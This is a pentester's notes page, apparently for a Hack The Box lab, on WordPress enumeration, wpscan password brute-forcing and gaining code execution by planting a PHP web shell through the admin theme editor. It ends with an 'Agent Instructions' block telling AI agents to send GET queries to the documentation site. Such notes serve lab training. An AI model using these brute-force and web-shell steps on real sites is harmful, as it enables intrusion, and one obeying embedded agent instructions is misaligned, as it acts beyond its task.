# Wordpress ## **Discovery & Enumeration** Note: We can use the [waybackurls](https://github.com/tomnomnom/waybackurls) tool to look for older versions of a target site using the Wayback Machine. Sometimes we may find a previous version of a WordPress site using a plugin that has a known vulnerability. If the plugin is no longer in use but the developers did not remove it properly, we may still be able to access the directory it is stored in and exploit a flaw. **Tools** Signs Wordpress are installed through `/robots.txt` ```bash User-agent: * Disallow: /wp-admin/ Allow: /wp-admin/admin-ajax.php Disallow: /wp-content/uploads/wpforms/ Sitemap: https://inlanefreight.local/wp-sitemap.xml ``` The presence of the `/wp-admin` and `/wp-content` directories would be a dead giveaway that we are dealing with WordPress. * WordPress stores its plugins in the `wp-content/plugins` directory. * Themes are stored in the `wp-content/themes` directory. **There are five types of users on a standard WordPress installation.** 1. Administrator: This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code. 2. Editor: An editor can publish and manage posts, including the posts of other users. 3. Author: They can publish and manage their own posts. 4. Contributor: These users can write and manage their own posts but cannot publish them. 5. Subscriber: These are standard users who can browse posts and edit their profiles. Getting access to an administrator is usually sufficient to obtain code execution on the server. Editors and authors might have access to certain vulnerable plugins, which normal users don’t. **Footprint enumeration** ```bash #Quick way to identify a WordPress site Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local | grep WordPress #Quick way to identify a themes Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local/ | grep themes #Quick way to identify a plugins Intrusionz3r0@htb[/htb]$ curl -s 'http://blog.inlanefreight.local' | grep plugins | grep -oP "http://[^\s']+" Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local/?p=1 | grep plugins ``` **Enumeration users** {% hint style="info" %} Try to use different password attack method. {% endhint %} ```jsx Intrusionz3r0@htb[/htb]$ sudo wpscan --password-attack wp-login -U -P pass.txt --url http://10.10.110.100/wordpress Intrusionz3r0@htb[/htb]$ sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local ``` Automate enumeration tools ```bash Intrusionz3r0@htb[/htb]$ sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB ``` ## **Panel RCE** **Modifying a php from the theme used (admin credentials needed)** Appearance → Theme Editor → 404 Template or footer (at the right) **Change the content for a php shell:**
``` http://example.com/wp-content/themes//footer.php?cmd=id ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/common-applications/wordpress.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.